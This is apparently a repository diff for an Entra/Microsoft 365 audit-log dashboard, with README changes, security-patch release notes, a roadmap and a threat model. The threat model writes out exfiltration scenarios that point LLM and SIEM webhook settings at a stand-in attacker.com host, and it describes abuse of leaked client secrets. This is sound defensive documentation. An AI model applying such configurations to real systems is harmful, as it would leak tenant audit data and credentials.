- Optional API protection: configure `AUTH_ENABLED=true` and set `AUTH_TENANT_ID`/`AUTH_CLIENT_ID` (the audience) plus allowed roles/groups. - Optional API protection: configure `AUTH_ENABLED=true` and set `AUTH_TENANT_ID`/`AUTH_CLIENT_ID` (the audience) plus allowed roles/groups.
@@ -49,8 +50,43 @@ cp .env.example .env
# LLM_BASE_URL=https://api.openai.com/v1 # LLM_BASE_URL=https://api.openai.com/v1
# LLM_MODEL=gpt-4o-mini # LLM_MODEL=gpt-4o-mini
# LLM_TIMEOUT_SECONDS=30 # LLM_TIMEOUT_SECONDS=30
# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
# Optional: SIEM forwarding
# SIEM_ENABLED=true
# SIEM_WEBHOOK_URL=https://your-siem.com/webhook
# SIEM_ALLOWED_DOMAINS=your-siem.com
# Optional: Azure Key Vault for secrets storage
# AZURE_KEY_VAULT_NAME=your-keyvault-name
``` ```
### Using Azure Key Vault for secrets
Instead of storing `CLIENT_SECRET`, `LLM_API_KEY`, `MONGO_URI`, and `WEBHOOK_CLIENT_SECRET` in `.env`, you can store them in Azure Key Vault:
1. Create a Key Vault and add secrets with these names:
- `aoc-client-secret` → your Graph app `CLIENT_SECRET`
- `aoc-llm-api-key` → your `LLM_API_KEY`
- `aoc-mongo-uri` → your `MONGO_URI`
- `aoc-webhook-client-secret` → your `WEBHOOK_CLIENT_SECRET`
2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
4. Ensure the container has Azure identity credentials (managed identity, service principal, or Azure CLI auth)
## Security Hardening Checklist
Before deploying to production:
- [ ] Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access
- [ ] Set explicit `CORS_ORIGINS` (do not use `*` in production with auth enabled)
- [ ] Set `DOCS_ENABLED=false` (default) to hide OpenAPI docs
- [ ] Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications
- [ ] Set `LLM_ALLOWED_DOMAINS` if using AI features to prevent data exfiltration
- [ ] Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding
- [ ] Review `METRICS_ALLOWED_IPS` — defaults to private networks only
- [ ] Consider Azure Key Vault instead of `.env` for secrets
- [ ] Review the threat model: `THREAT_MODEL_v1.7.13.md`
## Run with Docker Compose (recommended) ## Run with Docker Compose (recommended)
```bash ```bash
docker compose up --build docker compose up --build
@@ -76,7 +112,7 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000
## API ## API
- `GET /health` — health check with MongoDB connectivity status. - `GET /health` — health check with MongoDB connectivity status.
- `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors. - `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors (IP-restricted).
- `GET /api/version` — running version (baked into the Docker image at build time). - `GET /api/version` — running version (baked into the Docker image at build time).
- `GET /api/fetch-audit-logs` — pulls the last 7 days by default (override with `?hours=N`, capped to 30 days) of: - `GET /api/fetch-audit-logs` — pulls the last 7 days by default (override with `?hours=N`, capped to 30 days) of:
- Entra directory audit logs (`/auditLogs/directoryAudits`) - Entra directory audit logs (`/auditLogs/directoryAudits`)
@@ -171,7 +207,7 @@ curl http://localhost:8000/api/fetch-audit-logs
- Visit the UI at http://localhost:8000 to filter by user/service/action/result/time, search raw text, paginate, and view raw events. - Visit the UI at http://localhost:8000 to filter by user/service/action/result/time, search raw text, paginate, and view raw events.
## Maintenance (Dockerized) ## Maintenance (Dockerized)
Use the backend image so you dont need a local venv: Use the backend image so you don't need a local venv:
```bash ```bash
# ensure Mongo + backend network are up # ensure Mongo + backend network are up
docker compose up -d mongo docker compose up -d mongo
@@ -182,10 +218,15 @@ docker compose run --rm backend python maintenance.py dedupe
``` ```
Omit `--limit` to process all events. You can also run commands inside a running backend container with `docker compose exec backend ...`. Omit `--limit` to process all events. You can also run commands inside a running backend container with `docker compose exec backend ...`.
## Security Documentation
- `PEN_TEST_REPORT_v1.7.11.md` — Penetration test findings and remediation
- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra application abuse, token handling, data exfiltration vectors
## Notes / Troubleshooting ## Notes / Troubleshooting
- Ensure `TENANT_ID`, `CLIENT_ID`, and `CLIENT_SECRET` match an app registration with `AuditLog.Read.All` (application) permission and admin consent. - Ensure `TENANT_ID`, `CLIENT_ID`, and `CLIENT_SECRET` match an app registration with `AuditLog.Read.All` (application) permission and admin consent.
- Additional permissions: Office 365 Management Activity (`ActivityFeed.Read`), and Intune audit (`DeviceManagementConfiguration.Read.All`). - Additional permissions: Office 365 Management Activity (`ActivityFeed.Read`), and Intune audit (`DeviceManagementConfiguration.Read.All`).
- Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set). - Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set). A startup warning is logged if auth is enabled but no roles/groups are configured.
- Backfill limits: Management Activity API typically exposes ~7 days of history via API (longer if your tenant has extended/Advanced Audit retention). Directory/Intune audit retention follows your tenant policy (commonly 3090 days, longer with Advanced Audit). - Backfill limits: Management Activity API typically exposes ~7 days of history via API (longer if your tenant has extended/Advanced Audit retention). Directory/Intune audit retention follows your tenant policy (commonly 3090 days, longer with Advanced Audit).
- If you change Mongo credentials/ports, update `MONGO_URI` in `.env` (Docker Compose passes it through to the backend). - If you change Mongo credentials/ports, update `MONGO_URI` in `.env` (Docker Compose passes it through to the backend).
- The service uses the `micro_soc` database and `events` collection by default; adjust in `backend/config.py` if needed. - The service uses the `micro_soc` database and `events` collection by default; adjust in `backend/config.py` if needed.
- If using Azure Key Vault, ensure the runtime identity (managed identity, service principal, or local Azure CLI) has `Get` permission on secrets.

43
RELEASE_NOTES_v1.7.12.md Normal file
View File

@@ -0,0 +1,43 @@
# AOC v1.7.12 Release Notes
**Release Date:** 2026-04-27
## Security Hardening (Penetration Test Remediation)
This release addresses all findings from the internal soft penetration test of v1.7.11.
### Critical Fix: CORS Credentials Leak
- **Issue:** When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, the CORS middleware reflected any origin with `Access-Control-Allow-Credentials: true`, allowing cross-origin authenticated requests from attacker-controlled domains.
- **Fix:** When auth is enabled with a wildcard origin, `allow_credentials` is now forced to `False`. CORS still works for unauthenticated requests, but bearer tokens cannot be leaked cross-origin.
### High Fix: Missing Security Headers
- Added `X-Content-Type-Options: nosniff`
- Added `X-Frame-Options: DENY`
- Added `Referrer-Policy: strict-origin-when-cross-origin`
- Added `Permissions-Policy` restricting browser features (accelerometer, camera, geolocation, gyroscope, magnetometer, microphone, payment, USB)
### Medium Fixes
- **Rate limiter fail-closed:** Previously, a Redis outage silently disabled all rate limiting. The rate limiter now returns `429` when Redis is unreachable.
- **OpenAPI docs exposure:** `/docs`, `/redoc`, and `/openapi.json` are disabled by default. Set `DOCS_ENABLED=true` to re-enable (intended for development only).
### Low Fixes
- **Information disclosure:** `/api/config/auth` no longer leaks `tenant_id` and `client_id` when `auth_enabled=false`.
- **Webhook validation token:** Added length cap (1024 chars) and ASCII-only validation before echoing `validationToken`. Response now includes `X-Content-Type-Options: nosniff`.
## Files Changed
| File | Change |
|------|--------|
| `backend/main.py` | CORS fix, security headers middleware, conditional OpenAPI docs |
| `backend/config.py` | Added `DOCS_ENABLED` setting |
| `backend/rate_limiter.py` | Fail-closed on Redis errors |
| `backend/routes/config.py` | Hide tenant/client IDs when auth disabled |
| `backend/routes/webhooks.py` | Validate validationToken before echo |
| `backend/tests/conftest.py` | Enhanced FakeRedis mock with `incr`/`expire` |
| `.env.example` | Documented `DOCS_ENABLED` |
| `VERSION` | Bumped to 1.7.12 |
## Test Results
- **80/80 pytest tests passing**
- Penetration test report: `PEN_TEST_REPORT_v1.7.11.md`

34
RELEASE_NOTES_v1.7.13.md Normal file
View File

@@ -0,0 +1,34 @@
# AOC v1.7.13 Release Notes
**Release Date:** 2026-04-27
## Security Hardening: Alpine.js CSP Build
This release removes `unsafe-eval` from the Content-Security-Policy by switching the frontend to Alpine.js's CSP-compatible build.
### Changes
- **Frontend:** Switched from `alpinejs@3.x.x/dist/cdn.min.js` to `alpinejs@3.x.x/dist/csp.min.js`
- **Frontend:** Added explicit `Alpine.start()` call on `DOMContentLoaded` (required by CSP build)
- **Backend CSP:** Removed `'unsafe-eval'` from `script-src` directive
### Why this matters
The previous v1.7.111.7.12 releases included `'unsafe-eval'` in the CSP because the standard Alpine.js CDN build uses `new Function()` internally for reactive expression evaluation. The CSP build eliminates this requirement, further hardening the application against XSS and injection attacks.
### Compatibility
All existing Alpine.js directives (`x-data`, `x-init`, `x-show`, `x-text`, `x-for`, `x-if`, `x-model`, event handlers) continue to work unchanged. The CSP build uses a safe expression evaluator that produces identical behavior without `eval`/`new Function`.
## Files Changed
| File | Change |
|------|--------|
| `backend/frontend/index.html` | Alpine.js src → `csp.min.js`; added `Alpine.start()` |
| `backend/main.py` | Removed `'unsafe-eval'` from `script-src` CSP |
| `VERSION` | Bumped to 1.7.13 |
## Test Results
- **80/80 pytest tests passing**
- Ruff lint/format clean

64
RELEASE_NOTES_v1.7.14.md Normal file
View File

@@ -0,0 +1,64 @@
# AOC v1.7.14 Release Notes
**Release Date:** 2026-04-27
## Security Hardening: Threat Model Remediation
This release addresses the high-severity findings from the v1.7.13 threat model review.
### LLM Endpoint Domain Allowlist
- **New config:** `LLM_ALLOWED_DOMAINS` (comma-separated, supports wildcards like `*.openai.azure.com`)
- **Behavior:** When configured, the `/api/ask` endpoint rejects `LLM_BASE_URL` domains not in the allowlist
- **Impact:** Prevents audit data exfiltration via a compromised or attacker-controlled LLM endpoint
### SIEM Webhook SSRF Guard
- **New config:** `SIEM_ALLOWED_DOMAINS` (comma-separated)
- **Behavior:** The SIEM forwarder now validates `SIEM_WEBHOOK_URL` with the same SSRF checks as the LLM endpoint (HTTPS-only, blocks private IPs, enforces domain allowlist)
- **Impact:** Prevents real-time audit data exfiltration via a malicious SIEM webhook URL
### CDN Subresource Integrity (SRI)
- Added `integrity` hashes to both CDN scripts in the frontend:
- Alpine.js 3.15.11: `sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be`
- MSAL.js 2.37.0: `sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW`
- **Impact:** Browser refuses to execute CDN scripts if the content doesn't match the hash, preventing supply chain compromise
### Auth Misconfiguration Warning
- At startup, AOC now logs a `WARNING` if `AUTH_ENABLED=true` but neither `AUTH_ALLOWED_ROLES` nor `AUTH_ALLOWED_GROUPS` is configured
- **Impact:** Operators are alerted when the app is accidentally left open to all Entra users
### Azure Key Vault Integration (Optional)
- **New module:** `backend/secrets_manager.py`
- **New config:** `AZURE_KEY_VAULT_NAME`
- **Behavior:** If `AZURE_KEY_VAULT_NAME` is set, AOC fetches these secrets from Key Vault at startup:
- `aoc-client-secret``CLIENT_SECRET`
- `aoc-llm-api-key``LLM_API_KEY`
- `aoc-mongo-uri``MONGO_URI`
- `aoc-webhook-client-secret``WEBHOOK_CLIENT_SECRET`
- Falls back silently to `.env` / environment variables when Key Vault is not configured
- **Dependencies:** `azure-identity` and `azure-keyvault-secrets` (commented out in `requirements.txt` — uncomment when using Key Vault)
- **Impact:** Eliminates long-lived secrets from `.env` files and Docker images
## Files Changed
| File | Change |
|------|--------|
| `backend/config.py` | Added `LLM_ALLOWED_DOMAINS`, `SIEM_ALLOWED_DOMAINS`, `AZURE_KEY_VAULT_NAME` |
| `backend/routes/ask.py` | Domain allowlist enforcement for LLM URL |
| `backend/siem.py` | SSRF guard + domain allowlist for SIEM webhook |
| `backend/frontend/index.html` | SRI hashes for Alpine.js and MSAL.js |
| `backend/main.py` | Startup warning for auth misconfiguration |
| `backend/secrets_manager.py` | New — Azure Key Vault integration |
| `backend/requirements.txt` | Added optional Azure Key Vault packages |
| `.env.example` | Documented new settings |
| `VERSION` | Bumped to 1.7.14 |
| `THREAT_MODEL_v1.7.13.md` | Threat model documentation |
## Test Results
- **80/80 pytest tests passing**
- Ruff lint/format clean

99
RELEASE_NOTES_v1.7.7.md Normal file
View File

@@ -0,0 +1,99 @@
# AOC v1.7.7 Release Notes
**Release date:** 2026-04-24
---
## Security Hardening
This release is a focused security patch addressing findings from an internal audit. All users running AOC in production are encouraged to upgrade.
### Webhook authentication (`/api/webhooks/graph`)
- **ClientState validation** — Notifications now require a matching `WEBHOOK_CLIENT_SECRET`. Set this in your `.env` to the same value used when creating Graph subscriptions.
- Rejects spoofed notification payloads with `401 Unauthorized`.
### Rate limiting
- **Redis-backed fixed-window rate limiting** is now enabled by default.
- Per-category limits:
- `/api/fetch-audit-logs` — 10 requests/hour
- `/api/ask` — 30 requests/minute
- `/api/events/bulk-tags` — 20 requests/minute
- All other endpoints — 120 requests/minute
- Returns `429 Too Many Requests` with a `Retry-After` header when exceeded.
### SSRF protection for LLM calls
- `LLM_BASE_URL` is now validated before every outbound request.
- Blocks non-HTTPS URLs, localhost, link-local addresses (`169.254.169.254`), and all private IP ranges.
### CORS enforcement
- Wildcard (`*`) origins are **automatically stripped** when `AUTH_ENABLED=true`.
- A startup warning is logged if an insecure CORS configuration is detected.
### Content Security Policy
- API and HTML responses now include a `Content-Security-Policy` header.
- Restricts script sources to self, CDN origins, and MSAL auth library.
### Audit trail integrity
- The audit middleware no longer parses JWT tokens without signature verification.
- Verified claims are now propagated safely via `contextvars`, eliminating audit log poisoning.
### Standalone MCP server
- Prints a prominent security warning on startup reminding operators that the stdio transport has no authentication layer.
---
## Operational Improvements
### Bulk tag cap
- `POST /api/events/bulk-tags` now refuses to update more than **10,000 events** in a single request.
- Returns `400` with guidance to narrow filters.
### Generic error responses
- Internal exception details are no longer leaked in HTTP 500/502 responses.
- Full stack traces remain in server-side logs.
### Alert rule schema
- `conditions` field now uses a strict Pydantic model (`AlertCondition`) instead of an unconstrained `list[dict]`.
- Prevents stored data pollution from malformed rule payloads.
### Docker Compose
- MongoDB (`27017`) and Redis (`6379`) ports are no longer forwarded to the Docker host.
- Internal services are reachable only via the Docker network.
---
## Configuration
Add to your `.env`:
```bash
# Required if you use Graph webhooks
WEBHOOK_CLIENT_SECRET=your-random-secret
# Optional: disable rate limiting (not recommended)
RATE_LIMIT_ENABLED=true
RATE_LIMIT_REQUESTS=120
RATE_LIMIT_WINDOW_SECONDS=60
```
---
## Upgrade notes
**No breaking changes.** Existing event data, tags, comments, and saved searches are preserved.
After pulling:
```bash
export AOC_VERSION=v1.7.7
docker compose -f docker-compose.prod.yml pull
docker compose -f docker-compose.prod.yml up -d
```
---
## Docker image
```
git.cqre.net/cqrenet/aoc-backend:v1.7.7
```

View File

@@ -59,7 +59,7 @@ Goal: evolve from a polling dashboard into a full security operations tool.
--- ---
## Phase 5: Intelligence ## Phase 5: Intelligence
Goal: add AI-powered analysis and external tool integration. Goal: add AI-powered analysis and external tool integration.
- [x] AI feature flag (`AI_FEATURES_ENABLED`) to gate LLM-dependent features - [x] AI feature flag (`AI_FEATURES_ENABLED`) to gate LLM-dependent features
@@ -76,7 +76,26 @@ UI polish (topbar, footer, clickable pills) in v1.6.1v1.6.4.
--- ---
## Phase 6: Multi-Tenancy (Premium) ⏸️ ## Phase 6: Security Hardening ✅
Goal: address penetration test findings and threat model gaps.
- [x] Fix CORS credentials leak (v1.7.12)
- [x] Add security headers (X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy) (v1.7.12)
- [x] Make rate limiter fail-closed on Redis failure (v1.7.12)
- [x] Disable OpenAPI docs by default (v1.7.12)
- [x] Hide tenant_id/client_id from config endpoint when auth disabled (v1.7.12)
- [x] Validate webhook validationToken before echo (v1.7.12)
- [x] Gate `/metrics` behind IP allowlist (v1.7.12)
- [x] Add LLM domain allowlist (`LLM_ALLOWED_DOMAINS`) (v1.7.14)
- [x] Add SIEM webhook SSRF guard + domain allowlist (v1.7.14)
- [x] Add SRI hashes to CDN scripts (v1.7.14)
- [x] Add startup warning for auth misconfiguration (v1.7.14)
- [x] Add Azure Key Vault integration for secrets storage (v1.7.14)
- [x] Internal penetration test + threat model documentation
---
## Phase 7: Multi-Tenancy (Premium) ⏸️
Goal: allow MSPs to manage multiple client tenants from a single deployment. Goal: allow MSPs to manage multiple client tenants from a single deployment.
Status: **Planned — not started**. Architecture designed, pending validation of core features (SIEM export, alerting) in production first. Status: **Planned — not started**. Architecture designed, pending validation of core features (SIEM export, alerting) in production first.
@@ -88,10 +107,10 @@ Status: **Planned — not started**. Architecture designed, pending validation o
- Super-admin role for MSP staff to access all tenants - Super-admin role for MSP staff to access all tenants
### Implementation phases ### Implementation phases
- **Phase 6.1** (23 days): Tenant model & registry, tenant-aware data layer, per-tenant Graph API auth - **Phase 7.1** (23 days): Tenant model & registry, tenant-aware data layer, per-tenant Graph API auth
- **Phase 6.2** (1 day): Tenant-scoped API routes, tenant-specific config endpoints - **Phase 7.2** (1 day): Tenant-scoped API routes, tenant-specific config endpoints
- **Phase 6.3** (2 days): Frontend tenant switcher, tenant name display, admin page - **Phase 7.3** (2 days): Frontend tenant switcher, tenant name display, admin page
- **Phase 6.4** (1 day): License gating — signed JWT `LICENSE_KEY` gates multi-tenant mode - **Phase 7.4** (1 day): License gating — signed JWT `LICENSE_KEY` gates multi-tenant mode
### Licensing model ### Licensing model
- Single-tenant: remains MIT/free - Single-tenant: remains MIT/free

321
THREAT_MODEL_v1.7.13.md Normal file
View File

@@ -0,0 +1,321 @@
# AOC Threat Model — v1.7.13
**Date:** 2026-04-27
**Scope:** Entra ID / Microsoft Graph integration, token handling, data flows, external dependencies
**Assumptions:** Deployment is Docker Compose behind nginx reverse proxy; `AUTH_ENABLED=true`; `AI_FEATURES_ENABLED` may be true or false.
---
## Attack Surface Map
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ ATTACKER │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │
│ │ Frontend │ │ API │ │ Webhook │ │
│ │ (CDN JS) │ │ (/api/*) │ │ (/api/webhooks)│ │
│ └──────┬──────┘ └──────┬───────┘ └────────┬────────┘ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────────────────────────────────────────────────────┐ │
│ │ AOC BACKEND │ │
│ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ │
│ │ │ Auth │ │ Events │ │ Fetch │ │ Ask/LLM │ │ │
│ │ │ (JWT) │ │ (Mongo) │ │ (Graph) │ │ (HTTP) │ │ │
│ │ └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ │ │
│ │ │ │ │ │ │ │
│ │ ▼ ▼ ▼ ▼ │ │
│ │ ┌─────────────────────────────────────────────────────┐ │ │
│ │ │ SECRETS / CREDENTIALS │ │ │
│ │ │ CLIENT_SECRET │ LLM_API_KEY │ MONGO_PASSWORD │ │ │
│ │ └─────────────────────────────────────────────────────┘ │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │
│ │ Microsoft │ │ LLM API │ │ SIEM Webhook │ │
│ │ Graph API │ │ (OpenAI/ │ │ (optional) │ │
│ │ │ │ Azure) │ │ │ │
│ └─────────────┘ └──────────────┘ └─────────────────┘ │
└─────────────────────────────────────────────────────────────────────────────┘
```
---
## 1. Entra App Registration Abuse — HIGH
### 1.1 Client Credentials Leak = Full Tenant Read
**How it works:**
- AOC uses `client_credentials` flow (`graph/auth.py`)
- `CLIENT_ID` + `CLIENT_SECRET` are exchanged for an access token at `login.microsoftonline.com`
- The token has `https://graph.microsoft.com/.default` scope
- This grants **all application permissions** configured in the Entra app registration
**Typical permissions:**
- `Directory.Read.All` — read all users, groups, devices, roles
- `AuditLog.Read.All` — read all audit logs
- `DeviceManagementManagedDevices.Read.All` — read all Intune devices
**Attack scenario:**
1. Attacker gains read access to `.env` or the Docker container filesystem
2. Attacker calls the token endpoint directly with the leaked `CLIENT_ID`/`CLIENT_SECRET`
3. Attacker receives a Graph API access token valid for ~1 hour
4. Attacker can query ALL tenant data independently of AOC
**Impact:** Complete tenant data exfiltration — users, groups, devices, audit logs, mailboxes (if `Exchange.Read` granted).
**Mitigation in place:** None. The backend needs these permissions to function.
**Recommendation:**
- Store `CLIENT_SECRET` in a secret manager (Azure Key Vault, HashiCorp Vault) rather than `.env`
- Use short-lived certificates instead of long-lived secrets for app authentication
- Monitor Entra sign-in logs for anomalous `client_credentials` token requests
- Restrict app registration permissions to the absolute minimum (e.g., `AuditLog.Read.All` + `Directory.Read.All` only)
---
### 1.2 No Scope Restriction on Graph Token
**Finding:** `get_access_token()` always requests `https://graph.microsoft.com/.default` — the full permission set. There's no mechanism to request narrower scopes for specific operations.
**Impact:** If the app registration has 10 permissions, every token has all 10. A bug in one code path could expose data from all 10 permission areas.
**Recommendation:** Not easily fixable without splitting into multiple app registrations. Document as accepted risk.
---
## 2. Authentication & Token Validation — MEDIUM
### 2.1 JWKS Fetch Without TLS Certificate Validation Hardening
**Finding:** `_get_jwks()` fetches OIDC configuration and JWKS from `login.microsoftonline.com` using standard `requests` TLS validation. No certificate pinning or CA bundle restriction.
**Attack scenario (advanced):**
1. Attacker compromises DNS or a network hop between AOC and Microsoft
2. Attacker serves a fake JWKS endpoint with their own public key
3. Attacker issues a forged JWT signed with their private key
4. AOC validates the forged JWT against the attacker's public key
5. Attacker gains authenticated access
**Likelihood:** Very low (requires DNS compromise or nation-state-level interception).
**Mitigation:** Standard TLS validation is in place. For high-security environments, consider pinning the `login.microsoftonline.com` certificate thumbprint.
---
### 2.2 Missing `nbf` / `iat` Claim Verification
**Finding:** `_decode_token()` verifies `exp`, `tid`, `iss`, and `aud` but does not check `nbf` (not before) or `iat` (issued at) claims.
**Impact:** A token used before its validity period (`nbf`) or with a suspicious future `iat` would be accepted. Minor issue — MSAL tokens are well-formed in practice.
---
### 2.3 Role/Group Gating Defaults to "Allow All"
**Finding:** In `auth.py`:
```python
def _allowed(claims, allowed_roles, allowed_groups):
if not allowed_roles and not allowed_groups:
return True
```
**Impact:** If `AUTH_ENABLED=true` but `AUTH_ALLOWED_ROLES` and `AUTH_ALLOWED_GROUPS` are left empty (the default), **every Entra user in the tenant** can authenticate and use AOC. This is a common misconfiguration.
**Recommendation:** Add a startup warning when auth is enabled but no roles/groups are configured. Consider changing the default to deny-all.
---
### 2.4 Privacy Service Role Gating Also Defaults to "Allow All"
**Finding:** `user_can_access_privacy_services()` returns `True` if `PRIVACY_SERVICE_ROLES` is empty. If an admin configures `PRIVACY_SERVICES` (e.g., `Exchange`) but forgets to set `PRIVACY_SERVICE_ROLES`, all users see all privacy data.
---
## 3. Data Exfiltration Paths — HIGH
### 3.1 LLM Endpoint as Data Exfiltration Channel
**Finding:** When `AI_FEATURES_ENABLED=true` and `LLM_API_KEY` is set:
- The `/api/ask` endpoint sends audit event data (actors, targets, operations, summaries) to the configured LLM API
- `_validate_llm_url()` blocks private IPs but does NOT restrict the domain to an allowlist
- Any HTTPS URL is accepted
**Attack scenario:**
1. Attacker gains `.env` write access (or container filesystem access)
2. Attacker changes `LLM_BASE_URL` to `https://attacker.com/fake-llm`
3. Attacker sends an `/api/ask` request like "show me all events"
4. AOC queries MongoDB and sends up to `LLM_MAX_EVENTS` (default 200) events to the attacker's URL
5. Attacker receives structured audit data including actor names, UPNs, device names, operation details
**Impact:** Up to 200 audit events exfiltrated per API call. With pagination, an attacker could exfiltrate the entire database.
**Mitigation in place:** SSRF guard blocks private IPs and localhost.
**Gap:** No domain allowlist. An attacker-controlled public HTTPS endpoint is accepted.
**Recommendation:**
- Add `LLM_ALLOWED_DOMAINS` config (e.g., `api.openai.com,*.openai.azure.com`)
- Validate `LLM_BASE_URL` against this allowlist at startup and on every request
- Log all LLM requests with event counts sent
---
### 3.2 SIEM Webhook as Real-Time Exfiltration Channel
**Finding:** `siem.py` forwards every normalized event to `SIEM_WEBHOOK_URL` during ingestion:
```python
def forward_event(event):
if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
return
requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
```
**Gap:** No URL validation at all. Unlike the LLM endpoint, the SIEM webhook has NO SSRF guard.
**Attack scenario:**
1. Attacker sets `SIEM_ENABLED=true` and `SIEM_WEBHOOK_URL=https://attacker.com/collect`
2. Every new audit event fetched from Graph is immediately POSTed to the attacker's URL
3. Attacker receives real-time stream of all tenant audit events
**Impact:** Real-time, continuous data exfiltration of all audit events.
**Recommendation:**
- Add the same SSRF validation to `SIEM_WEBHOOK_URL` that exists for `LLM_BASE_URL`
- Add `SIEM_ALLOWED_DOMAINS` config
- Log SIEM forwarding failures prominently
---
### 3.3 Export Features (JSON/CSV)
**Finding:** The frontend has `exportJSON()` and `exportCSV()` functions that download all currently filtered events. These are authenticated but not rate-limited separately from `/api/events`.
**Impact:** A compromised account can export large batches of events. However, this requires authentication and is bounded by the 500-event page size limit.
**Risk level:** LOW — requires valid auth and is noisy.
---
## 4. Webhook Abuse — MEDIUM
### 4.1 Graph Change Notification Webhook
**Finding:** `/api/webhooks/graph` receives Microsoft Graph change notifications:
- Echoes `validationToken` for subscription handshake
- Accepts notifications with optional `clientState` validation
- `WEBHOOK_CLIENT_SECRET` is empty by default
**Attack scenario 1 — Subscription hijacking:**
1. Attacker discovers the webhook URL (via API enumeration or guess)
2. Attacker creates a Graph subscription pointing to the AOC webhook URL
3. Attacker receives change notifications for the subscribed resource
**Mitigation:** Notifications without matching `clientState` are rejected when `WEBHOOK_CLIENT_SECRET` is configured. But it's empty by default.
**Attack scenario 2 — Validation token abuse:**
1. Attacker sends a POST to `/api/webhooks/graph?validationToken=<arbitrary content>`
2. AOC echoes the token back as `text/plain`
3. Could be used for cache poisoning or response splitting
**Mitigation:** Length and ASCII validation added in v1.7.12.
**Recommendation:**
- Require `WEBHOOK_CLIENT_SECRET` to be set in production
- Document that the webhook endpoint should NOT be exposed to the public internet
---
## 5. Supply Chain — MEDIUM
### 5.1 CDN Scripts Without Subresource Integrity (SRI)
**Finding:** The frontend loads two external scripts without SRI hashes:
```html
<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script>
```
**Attack scenario:**
1. `cdn.jsdelivr.net` or `alcdn.msauth.net` is compromised (supply chain attack)
2. Malicious JavaScript is served instead of the legitimate library
3. Malicious script can steal MSAL tokens, modify API requests, or exfiltrate data
**Impact:** Complete frontend compromise — token theft, data exfiltration, UI spoofing.
**Recommendation:**
- Add SRI hashes to both script tags:
```html
<script defer src="..." integrity="sha384-..." crossorigin="anonymous"></script>
```
- Or vendor the JS files and serve them from the same origin
---
## 6. Privilege Escalation — MEDIUM
### 6.1 Application Permissions Bypass User Boundaries
**Finding:** Because AOC uses application permissions (not delegated permissions), the backend can read audit logs for ALL users, not just the authenticated user. The privacy service filtering (`PRIVACY_SERVICES`) is the only boundary — and it's opt-in.
**Impact:** A user with minimal Entra permissions (e.g., a regular user who can authenticate) can view audit logs for the entire tenant if:
- `PRIVACY_SERVICES` is not configured, OR
- `PRIVACY_SERVICE_ROLES` is not configured
**Recommendation:**
- Document that AOC should be restricted to admin/security roles via `AUTH_ALLOWED_ROLES`
- Consider adding per-user event filtering (only show events where the authenticated user is the actor or target)
---
## 7. Miscellaneous Vectors — LOW
### 7.1 Token Cache in Memory
**Finding:** `_TOKEN_CACHE` in `graph/auth.py` is an in-memory dictionary. If an attacker gains code execution in the Python process, they can read the cache or call `get_access_token()` directly.
**Impact:** Attacker with code execution can get Graph API tokens. But if they have code execution, they already have `CLIENT_SECRET` from memory or `.env`.
### 7.2 MongoDB Connection String
**Finding:** `MONGO_URI` contains credentials. If an attacker gains filesystem access, they can connect directly to MongoDB and bypass all AOC auth/privacy controls.
**Mitigation:** MongoDB is internal to Docker network (not exposed to host in production compose file).
### 7.3 Audit Trail Log Injection
**Finding:** `audit_trail.log_action()` stores actions in MongoDB. The `details` dict could contain user-controlled data (e.g., filter values). If the audit log is ever rendered without escaping, this could lead to XSS.
**Risk level:** LOW — audit logs are not currently rendered in the UI.
---
## Risk Summary
| Vector | Severity | Likelihood | Requires |
|--------|----------|------------|----------|
| Client secret leak → full tenant read | **HIGH** | Medium | `.env` or container access |
| LLM endpoint hijacking → data exfil | **HIGH** | Low | `.env` write access |
| SIEM webhook hijacking → real-time exfil | **HIGH** | Low | `.env` write access |
| CDN compromise → frontend token theft | **MEDIUM** | Low | Supply chain attack |
| Role gating misconfig → all users access | **MEDIUM** | High | Misconfiguration |
| Webhook subscription hijacking | **MEDIUM** | Low | URL discovery |
| DNS compromise → fake JWKS | **MEDIUM** | Very low | Network compromise |
| Application permissions bypass boundaries | **MEDIUM** | High | Default config |
| Token replay | LOW | Low | Token theft |
| Audit log injection | LOW | Low | Filter manipulation |
---
## Immediate Recommendations
1. **Add LLM domain allowlist** (`LLM_ALLOWED_DOMAINS`) and validate at startup
2. **Add SIEM SSRF guard** — reuse `_validate_llm_url()` for `SIEM_WEBHOOK_URL`
3. **Add SRI hashes** to CDN script tags, or vendor the libraries
